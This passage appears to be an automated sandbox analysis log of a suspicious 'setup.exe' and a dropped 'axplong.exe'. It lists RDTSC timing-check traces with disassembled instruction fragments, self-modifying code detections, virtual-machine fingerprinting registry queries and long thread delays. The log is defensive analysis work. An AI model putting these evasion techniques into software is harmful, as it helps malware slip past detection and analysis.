                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA0136 second address: 4AA017A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F808D280535h 0x0000000b or ah, FFFFFFA6h 0x0000000e jmp 00007F808D280531h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F808D28052Dh 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA017A second address: 4AA0180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA0180 second address: 4AA0184 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA0184 second address: 4AA01A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D4B80C2h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA01A3 second address: 4AA01A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA01A9 second address: 4AA01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AA01AD second address: 4AA01CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D280534h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC09B4 second address: 4AC09E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80C4h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC09E6 second address: 4AC0A45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F808D280531h 0x00000009 add eax, 7C65DCB6h 0x0000000f jmp 00007F808D280531h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov eax, 4EAC94B5h 0x00000021 pushfd 0x00000022 jmp 00007F808D280532h 0x00000027 or eax, 7DBC4708h 0x0000002d jmp 00007F808D28052Bh 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0A45 second address: 4AC0A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0A4B second address: 4AC0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0533 second address: 4AC0550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0550 second address: 4AC057C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 37BE8EB2h 0x00000008 jmp 00007F808D280533h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov al, D8h 0x00000014 mov ecx, edi 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC057C second address: 4AC0580 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0580 second address: 4AC058F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC058F second address: 4AC05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80C4h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC05A7 second address: 4AC05AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC05AB second address: 4AC05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F808D4B80C7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F808D4B80C5h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0299 second address: 4AC029D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC029D second address: 4AC02A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02A1 second address: 4AC02A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02A7 second address: 4AC02BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02BE second address: 4AC02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02C3 second address: 4AC02C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02C9 second address: 4AC02CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02CD second address: 4AC02D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02D1 second address: 4AC02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, 54A68A61h 0x00000011 popad 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02E3 second address: 4AC02E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC02E9 second address: 4AC02ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0008 second address: 4AD000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD000E second address: 4AD0089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, A6h 0x0000000d mov dx, 819Eh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F808D280534h 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F808D28052Eh 0x00000020 xor ecx, 27275B98h 0x00000026 jmp 00007F808D28052Bh 0x0000002b popfd 0x0000002c pushad 0x0000002d call 00007F808D280536h 0x00000032 pop ecx 0x00000033 mov al, dl 0x00000035 popad 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0089 second address: 4AD008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD008F second address: 4AD0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0095 second address: 4AD0099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00629 second address: 4B00650 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280535h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00650 second address: 4B00674 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D4B80BCh 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B00674 second address: 4B0069B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F808D280535h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B0069B second address: 4B006AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B006AB second address: 4B006D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D28052Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F808D280535h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B006D5 second address: 4B006E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D4B80BCh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4B006E5 second address: 4B006F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d pop ebx 0x0000000e mov ebx, esi 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE010A second address: 4AE0127 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0127 second address: 4AE0187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F808D280537h 0x00000009 sbb ax, 8B7Eh 0x0000000e jmp 00007F808D280539h 0x00000013 popfd 0x00000014 mov ecx, 754EF1C7h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007F808D28052Ah 0x00000022 push eax 0x00000023 jmp 00007F808D28052Bh 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0187 second address: 4AE018B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE018B second address: 4AE018F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE018F second address: 4AE0195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0195 second address: 4AE019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE019B second address: 4AE019F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE019F second address: 4AE01A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE01A3 second address: 4AE01E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushfd 0x00000010 jmp 00007F808D4B80C9h 0x00000015 and al, 00000076h 0x00000018 jmp 00007F808D4B80C1h 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov cl, B9h 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE01E6 second address: 4AE0223 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007F808D28052Ch 0x00000015 jmp 00007F808D280535h 0x0000001a popfd 0x0000001b pop eax 0x0000001c popad 0x0000001d and dword ptr [eax], 00000000h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0223 second address: 4AE0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0227 second address: 4AE022D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE022D second address: 4AE0287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, dx 0x00000006 pushfd 0x00000007 jmp 00007F808D4B80BDh 0x0000000c adc ax, A496h 0x00000011 jmp 00007F808D4B80C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a and dword ptr [eax+04h], 00000000h 0x0000001e jmp 00007F808D4B80BEh 0x00000023 pop ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F808D4B80C7h 0x0000002b rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE0287 second address: 4AE029F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AE029F second address: 4AE02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC0402 second address: 4AC041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D280534h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC041A second address: 4AC041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0C5D second address: 4AD0CB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F808D280535h 0x00000013 or ax, 7896h 0x00000018 jmp 00007F808D280531h 0x0000001d popfd 0x0000001e mov ch, 59h 0x00000020 popad 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F808D280536h 0x00000029 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0E5D second address: 4AD0E61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0E61 second address: 4AD0E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD0E67 second address: 4AD0E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f mov ecx, 61E5F949h 0x00000014 popad 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0D74 second address: 4AF0D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0D78 second address: 4AF0D7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0D7E second address: 4AF0D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F808D28052Bh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0D8D second address: 4AF0DA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F808D4B80BBh 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0DA3 second address: 4AF0DE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D280539h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F808D28052Eh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 pop edx 0x00000015 mov ch, 2Bh 0x00000017 popad 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c push esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, dx 0x00000023 pushad 0x00000024 popad 0x00000025 popad 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0DE6 second address: 4AF0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0DEC second address: 4AF0DF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0DF0 second address: 4AF0E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F808D4B80C5h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0E12 second address: 4AF0E8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov edx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FB65FCh] 0x00000010 jmp 00007F808D280532h 0x00000015 test eax, eax 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F808D28052Eh 0x0000001e sub cl, FFFFFF98h 0x00000021 jmp 00007F808D28052Bh 0x00000026 popfd 0x00000027 mov cx, 584Fh 0x0000002b popad 0x0000002c je 00007F80FF6C3032h 0x00000032 jmp 00007F808D280532h 0x00000037 mov ecx, eax 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F808D280537h 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0E8D second address: 4AF0EB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F808D4B80BAh 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0EB9 second address: 4AF0F25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx ebx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F808D280532h 0x00000016 adc cx, 6418h 0x0000001b jmp 00007F808D28052Bh 0x00000020 popfd 0x00000021 call 00007F808D280538h 0x00000026 pop eax 0x00000027 popad 0x00000028 jmp 00007F808D28052Bh 0x0000002d popad 0x0000002e ror eax, cl 0x00000030 pushad 0x00000031 mov ebx, eax 0x00000033 pushad 0x00000034 movsx ebx, si 0x00000037 popad 0x00000038 popad 0x00000039 leave 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0F25 second address: 4AF0F36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F808D4B80BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AF0F36 second address: 4AF0F4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c retn 0004h 0x0000000f nop 0x00000010 mov esi, eax 0x00000012 lea eax, dword ptr [ebp-08h] 0x00000015 xor esi, dword ptr [003C2014h] 0x0000001b push eax 0x0000001c push eax 0x0000001d push eax 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 push eax 0x00000022 call 00007F80919F149Bh 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 3CE901 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 5A3DA0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 57EB7D instructions caused by: Self-modifying code
                  Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 60F6E0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 106E901 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 1243DA0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 121EB7D instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeSpecial instruction interceptor: First address: 12AF6E0 instructions caused by: Self-modifying code
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                  Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_04B2034E rdtsc 0_2_04B2034E
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 1248Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 966Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 1029Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeWindow / User API: threadDelayed 1342Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7588Thread sleep count: 1248 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7588Thread sleep time: -2497248s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7584Thread sleep count: 966 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7584Thread sleep time: -1932966s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe TID: 7604Thread sleep count: 1029 > 30Jump to behavior
